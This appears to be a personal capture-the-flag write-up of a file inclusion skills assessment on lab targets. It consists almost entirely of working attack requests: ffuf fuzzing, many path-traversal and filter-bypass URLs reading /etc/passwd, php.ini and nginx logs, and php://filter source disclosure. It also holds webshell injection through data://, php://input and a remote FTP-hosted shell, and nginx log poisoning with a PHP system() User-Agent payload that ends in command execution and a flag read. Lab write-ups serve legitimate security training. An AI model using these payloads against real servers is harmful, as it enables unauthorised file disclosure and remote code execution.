Skills Assessment - File Inclusion
April 23, 2024
It is an nginx web server
So this is where we might do some LFI leads to RCE
http://83.136.255.150:58892/index.php?page=about
First we did try to find some LFI with Jhaddix wordlist but it returns nothing
First ffuf = Jhaddix.txt
ffuf -u http://83.136.255.150:58892/index.php?page=FUZZ -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -fs 4521,4322
Nothing
Second ffuf - directory list medium
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://83.136.253.251:40368/FUZZ.php
Nothing
Third ffuf - LFI Linux
ffuf -u http://83.136.253.251:40368/index.php?page=../../../../FUZZ -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Wordlist-Linux -fs 4521
Fourth fuff - default web root
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt -u http://94.237.54.170:31057/index.php?page=../../../../FUZZ/index.php -fs 4521
Still nothing
http://94.237.57.59:39554/index.php?page=./contact/../../../../../../../etc/passwd
http://94.237.57.59:39554/index.php?page=contact/../../../../../../../etc/passwd
http://94.237.56.188:58604/index.php?page=./about/....//....//....//....//etc/passwd
http://83.136.254.223:54825/index.php?page=industries//....//....//....//....//....//....//etc/passwd
http://83.136.254.223:54825/index.php?page=industries//..../\..../\..../\..../\..../\..../\etc/passwd
http://83.136.254.223:54825/index.php?page=..../\..../\..../\..../\..../\..../\etc/passwd
http://83.136.254.223:54825/index.php?page=about/....\/....\/....\/....\/....\/....\/etc/passwd
http://83.136.254.223:54825/index.php?page=....\/....\/....\/....\/....\/....\/etc/passwd
http://83.136.254.223:54825/index.php?page=about//..../////....////////....////////....//////....///////....////////etc/passwd
http://94.237.57.59:39554/index.php?page=./contact/../../../../../../../etc/passwd%00.php
http://94.237.56.188:58604/index.php?page=..///////..////..//////etc/passwd
http://83.136.255.150:58892/index.php?page=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
http://83.136.255.150:58892/index.php?page=....//....//....//....//etc/passwd
http://94.237.57.59:39554/index.php?page=contact/../../../../../../../etc/passwd%00.php
http://94.237.57.59:39554/index.php?page=../../../../../var/log/nginx/access.log
http://94.237.57.59:39554/index.php?page=page=....//....//....//....//....//var/log/nginx/access.log
http://94.237.54.170:31057/index.php?page=/var/log/nginx/access.log%00
http://94.237.57.59:39554/index.php?page=page=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fvar%2Flog%2Fnginx%2Faccess.logStill nothing
http://83.136.255.150:35577/index.php?page=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.3/fpm/php.ini
http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=./about/....//....//....//....//etc/php/7.3/fpm/php.ini
http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=.%2Fabout%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fphp%2F7.3%2Ffpm%2Fphp.ini
http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=/var/log/nginx/access.log
http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=../../../../../var/log/nginx/access.log
http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=contact/....//....//....//....//....//var/log/nginx/access.log
http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=....//....//....//....//....//var/log/nginx/access.log
/index.php?page=php://filter/read=convert.base64-encode/resource=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%68%70%2f%37%2e%33%2f%66%70%6d%2f%70%68%70%2e%69%6e%69Still nothing
http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=../../../../../../../../etc/passwd
http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=about/../../../../../../../../etc/passwd
http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=about%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=about%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00This is the return result that is says "Invalid input detected" when i'm includidng ../../../ attack
PHP Session
This doesnt return anything
http://94.237.57.59:39554/index.php?page=page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
http://94.237.57.59:39554/index.php?page=ftp://10.10.14.166/cmd-webshell.php&cmd=id
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' 'http://94.237.56.188:58604/index.php?page=php://input&cmd=id'HERE IS THE ANSWER
http://83.136.253.251:55954/index.php?page=php://filter/read=convert.base64-encode/resource=index
Then just decode it using online site
http://94.237.62.149:30835/ilf_admin/index.php?log=system.log
http://94.237.62.149:30835/ilf_admin/index.php?log=../../../../../../etc/passwd
http://94.237.62.149:43967/ilf_admin/index.php?log=../../../../../../../etc/nginx/nginx.conf
http://94.237.62.149:30835/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log
First we have to create a payload that will poison the log
With this code we can exectue RCE
curl -s 'http://94.237.58.148:42207/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log' -A '<?php system($_GET['cmd']); ?>'
Then we will just use our browser to use some commands like id
http://94.237.58.148:42207/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log&cmd=id
Just view the files in the root directory - cd /; ls
http://94.237.58.148:42207/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log&cmd=cd%20/;%20ls
Just cat the flag - 'cat /flag_dacc60f2348d.txt'
http://94.237.58.148:42207/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log&cmd=cat%20/flag_dacc60f2348d.txt
Last updated